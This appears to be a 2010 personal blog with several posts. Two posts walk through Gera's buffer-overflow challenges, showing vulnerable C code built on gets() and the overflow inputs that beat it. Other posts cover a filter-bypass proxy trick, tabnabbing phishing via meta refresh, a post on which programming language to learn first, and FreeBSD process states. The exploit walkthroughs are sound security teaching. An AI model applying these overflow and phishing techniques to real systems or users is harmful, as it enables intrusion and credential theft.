Thursday, December 23, 2010

Warming up to the stack #2

#include <stdio.h>
int main() {
  int cookie;
  char buf[80];
  printf("buf: %08x cookie: %08x\n", &buf, &cookie);
  gets(buf);
  if (cookie == 0x01020305)
    printf("you win!\n");
}

Gera's challenge #2 is exactly the same as the first one other than the cookie we need to write. What makes this interesting is that the characters are not "printable" (they don't have a symbolic representation.

There are a few ways to deal with this:
  • Take a file similar the original one and use a hex editor, like hexcurse(1), to manually modify it.
  • Use inline perl. perl -e 'print "q" x 80 . "\x05\x03\x02\x01"'
  • Directly entering the special characters using ctrl+v followed by a ctrl+key. The key is 0x40 + the value. This won't necessarily work on your terminal due to the Ctrl + C
%./a.out <exploit
buf: bfbfe9e8 cookie: bfbfea38
you win!

Tuesday, December 21, 2010

Gera's Insecure Programming: Warming up to the stack #1

Gera has a series of "challenges" designed to help teach people the basics of exploitation. The goal is to provide some input to the program to get it to output you win!"

The code for the first one
/*
* stack1.c
* specially crafted to feed your brain by gera
*/
int main() {
   int cookie;
   char buf[80];
   printf("buf: %08x cookie: %08x\n", &buf, &cookie);
   gets(buf);
   if (cookie == 0x41424344)
      printf("you win!\n");
   }
}

At a lower level
The assembly for the above program generated by clang on FreeBSD with -O3 -fomit-frame-pointer (comments are my addition)
...
main:
   pushl %esi
   subl $100, %esp
   leal -8(%ebp), %eax
   movl %eax, 8(%esp)
   leal -88(%ebp), %esi
   movl %esi, 4(%esp)
   movl $.L.str, (%esp)
   call printf
   movl %esi, (%esp)
   call gets      ; note that gets does not have a length argument
   cmpl $1094861636, -8(%ebp)
   jne .LBB0_2    ; we will come back to this
   movl $str, (%esp)
   call puts
.LBB0_2:
   xorl %eax, %eax
   addl $100, %esp
   popl %esi
   ret
...

Break it down
The program starts off by creating two variables: a cookie and a fixed size buffer. It then prints out the address of buf and cookie
Then the fun starts: gets(3) is called to put data in buf. gets is a very insecure function. To quote the man page:
The gets() function cannot be used securely. Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming line, the use of this function enables malicious users to arbitrarily change a running program's functionality through a buffer overflow attack.
Then we have a check to see if cookie is equal to some value. We can convert this value from an integer to printable ascii(7) characters. 0x41is A, 0x42 is B, etc. So we want to set the cookie to "ABCD". There is one little gotcha: The machine I'm using (and most you probably are) is little endian so we actually need to reverse the order of our text.
What should we actually do?
There is no guarantee of how C variables are stored but we can make a good guess. On my system sizeof(int) is 4 and sizeof(char) is always 1 so our stack probably looks like:
cookie most significant byte
cookie byte 2
cookie byte 3 
cookie least significant byte
buf[79]
buf[78]
...
buf[0]
Lets try it!

The string we want to insert is
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxDCBA. 80 random characters to fill the buffer and then DCBA to fill the cookie (the important part)

[eitan@ByteByte ~/gstack ]%echo $(jot -b x -s '' 80)DCBA > exploit 
[eitan@ByteByte ~/gstack ]%./a.out <exploit 
buf: bfbfea48 cookie: bfbfea98
you win!
A different way:
Lets say we didn't have the source and that this was some music player we wanted to (legally) jailbreak. If you disassemble the file you could can change the jump address or just remove the jump altogether to avoid the check
[eitan@ByteByte ~/gstack !130!]%./a.out
buf: bfbfea48 cookie: bfbfea98
you win!
Some notes

No serious programmer uses gets anymore and real exploits are likely to be harder to create due to OpenBSD's w^x protection, gcc's stack protector, and good coding habits. This was just an intro to the art of exploitation. I plan on following with either the next warming up to the stack challenge or the "esoteric" format string vulnerabilities.

Update 12/26/10 clarified the goal of the exploit. Explained what "jot" does.

Thursday, December 2, 2010

Google translate proxy no longer available

One old trick to bypass simple domain based filters was to use Google translate on the domain and go from English to English (or the native language to the native language - whatever it might be).

I recently came across a link that happen to be using Google translate in that way a (I'm not sure why) and I got an error from Google

"Translation from English into English is not supported."

When I tried with other languages I got similar errors. Translating to other languages works as usual.

Luckily this trick is not really needed as there are thousands of available proxies or one could just make their own.

Sunday, October 10, 2010

What language should you learn first?

Kaushal Shriyan on the beginners@perl.org mailing list asked:
"Is it better to learn Perl or Python since i can manage only writing simple bash shell scripts."[1]
Recently on ##C++-basic there was a discussion that related to learning low level vs high level languages first.

Both of these discussions are based on the premise that there is a right answer.

There are a number of things wrong with this question.
  1. Kaushal seems to be saying that he can only learn one language or the other. Why not learn both?
  2. Programming language choice depends on the project one plans on working on. Using perl to write a kernel is impossible and using COBOL to write a GUI application is silly. Asking such a question requires more context.
  3. For some reason only Perl and Python are the only languages given as choices. What about C++? Why not Haskell? There are many useful languages and they each have their own pros and cons.
More generally, there are many skills have a programmer needs to have and there are different ways of learning each of these skills.
  • Code organization and Design Patterns
  • Programming constructs
  • Abstraction and encapsulation
  • Data structures and how to choose between them
  • Syscalls and context switching
  • and many more
All of these topics can be reasonably broken down into two types: programming topics and computer science topics.

Higher-level languages allow programmers to abstract away the low level details and focus on getting a task done. This is great for completing a task and making a beginner feel proud about what (s)he has created. It also helps the programmer learn programming basics such as variables, loops, arrays, input/output, and functions without getting bogged down with memory management.

On the other hand, choosing between various data structures is confusing unless one understands why things work the way they do. Learning about context switches, data structures, syscalls, pointers, etc is easier in a low level language (like C or C++).
 
So what language should someone learn first?

A good programmer should learn both types of languages. In my experience a lot beginners have trouble wrapping their heads around functions and other organizational patterns such as classes. I usually start people with Python and move quickly to C++. This helps to teach good programming style and techniques before they get to learn the low level concepts as well. 

[1] http://comments.gmane.org/gmane.comp.python.tutor/65413

Monday, September 20, 2010

Proccess Kernel States (wchan in ps)

FreeBSD has a nice feature that will signal a process with SIG-INFO when you press Ctrl-T and will tell you some other interesting data about the process such as the load of the CPU, current command that is being run, and the kernel state the process is in (the wchan keyword in ps(1)).
This state is set by the msleep function and is a syscall or lock that the proccess is waiting on

I know of no other list explaining each of these states so here it goes:

biord: block on io read.
futex: [Linux emulation] process is waiting until a futex is released (see fast userspace mutex)
getblk: get block (seems to be generated often by tar)
nanoslp: process is sleeping for some number of nanoseconds (see nanosleep(2))
pause: process is waiting for a signal (see pause(3))
pcmwrv: waiting for audio samples to be played
piperd: read(2) from a pipe
pipewr: write(2) to a pipe
physrd: reading from a HDD
runnable: process is ready to run on the CPU
running: currently on CPU
sbwait: wait for socket to return data (see uipc_sockbuf.c) 
swread: read in from swap
stopev: process is stopped because of a debugging event (see sys_process.c; relates to ptrace(2))
tttout: write(2) to a tty
ttyin: read(2) from a tty
ucond: a proccess is blocked until a pthreads mutex is released
vnread: part of the pager (see vnode_pager.c)
wait: wait(2) for a child process
wdrain: write drain. On a device mounted with the async option (or soft-updates) wait until all the previous writes have been completed. (see vfs_bio.c)
zombie: a process died but its parent did not wait(2) for it.

There are other syscalls that are similar to the ones mentioned above (such as readv(2) instead of read(2), and waitpid(2) instead of wait(2)) which will end up with the same wchans.

Thank you irc://irc.efnet.org/nox--- for helping me figure out what all of these mean.

I will try to keep this list up-to-date as I find out about more of them.

Update 9/21/10: removed "CPU0" state - it doesn't show up in the siginfo output - only in the top output.
Update 9/22/10: added getblk entry without link to syscall
Update 10/7/10: added wdrain, swread - I have a /lot/ more to add. 
I need to add all the following - and more: sfbufa, umtxqb, psleep, qsleep, bo_wwait, bwunpin, sigwait, pause, suspkp suspkp ktsusp  mntref, "mount drain", roothold, rootwait, failpt, exithold, exit1, ritwait , kqflxwt, kqclose, kqclo1, kqclo2, kqkclr, kqflxwt, ithread, iev_rmh , purgelocks, conifhk, aioprn, aiordy, aiospn, aiowc vlruwt vlruwk targrd tgabrt cgticb cgticb  sgread simfree ccb_scanq crydev  crypto_destroy crypto_destroy crypto_ret_wait

Wednesday, June 30, 2010

Sunday, May 30, 2010

Tabnabbing Without Javascript

    I recently came across a new type of phishing attack called tabnabbing. The attack works by using a client side script to detect when the user is not viewing the page, then changes the page content to a phishing page.

    This method desribed by Aza Raskin could be easily prevented by disabling Javascript. However, it is possible to perform the attack even if Javascript is disabled. Most browsers have the ability to refresh the page using a <meta> refresh tag. The page waits until presumably the user isn't looking at the tab any more, then changes the location of the page to one that resembles the true site (as shown in this proof of concept).

If you got to this post via the POC please note that the POC is not a phishing site and I DO NOT log ANY usernames or passwords.